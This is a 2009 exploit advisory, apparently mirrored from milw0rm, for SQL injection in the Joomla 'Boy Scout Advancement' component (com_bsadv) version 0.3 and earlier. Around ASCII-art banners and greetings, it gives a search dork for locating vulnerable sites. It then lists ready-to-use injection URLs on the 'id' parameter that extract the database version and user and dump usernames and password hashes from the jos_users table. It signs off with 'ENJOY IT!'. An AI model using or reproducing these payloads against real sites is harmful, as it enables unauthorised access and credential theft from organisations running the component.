Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit

Document Sample
Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit Powered By Docstoc
					                       Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit                            Page 1/3
  1    ***********************************************************************************************
  2    ***********************************************************************************************
  3    **                                                                                           **
  4    **                                                                                           **
  5    **     [] [] [] [][][][> []       [] [][ ][]       []   [][]] [] [> [][][][> [][][][]        **
  6    **     || || || []         [][]   []   [] []      []   []      [] []   []        []    []    **
  7    ** [> [][][][] [][][][> [] [] []       [] []    [][] []        [][]    [][][][> []     []    **
  8    ** [−−−−−[]−−−−−[][][][>−−[]−−[]−[]−−−[][][]−−[]−[]−−[]−−−−−−−−[]−−−−−[][][][>−−[][][][]−−−\
  9    **==[>    []     []        []   [][]   [] [] [][][] []         [][]    []           [] [] >>−−
  10   ** [−−−−[[]]−−−−[]−−− −−−−[]−−−−−[]−−−[]−−[]−−−−−[]−−[]−−−−−−−[] []−−−[]−−−−−−−−−−[]−−[]−−−/
  11      [>   [[[]]]   [][][][> [][]    [] [][[] [[]] [][] [][][] [] [> [][][][> <][]        []    **
  12   **                                                                                           **
  13   **                                                                                           **
  14   **                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                       **
  15   **                                      ¡PROUD TO BE SPANISH!                               **
  16   **                                                                                           **
  17   ***********************************************************************************************
  18   ***********************************************************************************************
  19
  20   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  21   |                                MULTIPLE SQL INJECTION VULNERABILITIES                      |
  22   |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−|
  23   |                   | Joomla Component ’Boy Scout Advancement’ <= v−0.3 (com_bsadv) |        |
  24   |CMS INFORMATION:    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−         |
  25   |                                                                                            |
  26   |−−>WEB: http://bsadv.sourceforge.net/                                                       |
  27   |−−>DOWNLOAD: http://bsadv.sourceforge.net/                                                  |
  28   |−−>DEMO: N/A                                                                                |
  29   |−−>CATEGORY: Joomla/Component                                                               |
  30   |−−>DESCRIPTION: BSAdv is a Joomla 1.5 component for Boy Scout unit data and advancement     |
  31   |               data for Boy Scout Troops in the United States...                            |
  32   |−−>RELEASED: 2009−02−01                                                                     |
  33   |                                                                                            |
  34   |CMS VULNERABILITY:                                                                          |
  35   |                                                                                            |
  36   |−−>TESTED ON: firefox 3                                                                     |
  37   |−−>DORK −−> inurl:"?option=com_bsadv"                                                       |
  38   |−−>CATEGORY: SQL INJECTION                                                                  |
  39   |−−>AFFECT VERSION: <= 0.3                                                                   |
  40   |−−>Discovered Bug date: 2009−05−25                                                          |
  41   |−−>Reported Bug date: 2009−05−25                                                            |
  42   |−−>Fixed bug date: Not fixed                                                                |
  43   |−−>Info patch: Not fixed                                                                    |
  44   |−−>Author: YEnH4ckEr                                                                        |
  45   |−−>mail: y3nh4ck3r[at]gmail[dot]com                                                         |
  46   |−−>WEB/BLOG: N/A                                                                            |
  47   |−−>COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
  48   |−−>EXTRA−COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)                      |
  49   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  50
  51
  52   ############################
YEnH4ckEr                                                                                                   05/26/2009
                        Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit                                  Page 2/3
  53    ///////////////////////////
  54
  55    SQL INJECTION VULNS (SQLi):
  56
  57    ///////////////////////////
  58    ############################
  59
  60
  61
  62    <<<<−−−−−−−−−++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++−−−−−−−−−>>>>
  63
  64
  65
  66    −−−−−−−−−−−−−−−−−−−
  67    PROOFS OF CONCEPT:
  68    −−−−−−−−−−−−−−−−−−−
  69
  70
  71
  72    [++] GET var −−> ’id’
  73
  74
  75    ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=−1+UNION+ALL+SELECT+1,version()
        ,database(),user()%23
  76
  77
  78    [++] GET var −−> ’id’
  79
  80
  81    ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=−1+UNION+ALL+SELECT+database(
        ),version()%23&Itemid=57
  82
  83
  84
  85    [++[Return]++] ~~~~~> User, version or database.
  86
  87
  88
  89    −−−−−−−−−−−
  90    EXPLOITS:
  91    −−−−−−−−−−−
  92
  93
  94
  95    ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=−1+UNION+ALL+SELECT+1,concat(us
        ername,0x3A3A3A,password),3,4+FROM+jos_users+WHERE+id=62%23
  96
  97
  98
  99    [++[Return]++] ~~~~~> Username:::password id=62
  100
  101

YEnH4ckEr                                                                                                           05/26/2009
                        Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit                                  Page 3/3
  102
  103   ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=−1+UNION+ALL+SELECT+username,
        password+FROM+jos_users+WHERE+id=62%23&Itemid=57
  104
  105
  106
  107   [++[Return]++] ~~~~~> Username and password id=62
  108
  109
  110
  111
  112   <<<−−−−−−−−−−−−−−−−−−−−−−−−−−−−−EOF−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−>>>ENJOY IT!
  113
  114
  115
  116   #######################################################################
  117   #######################################################################
  118   ##*******************************************************************##
  119   ## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
  120   ##*******************************************************************##
  121   ##−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−##
  122   ##*******************************************************************##
  123   ## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!##
  124   ##*******************************************************************##
  125   #######################################################################
  126   #######################################################################
  127
  128   # milw0rm.com [2009−05−26]




YEnH4ckEr                                                                                                           05/26/2009

				
DOCUMENT INFO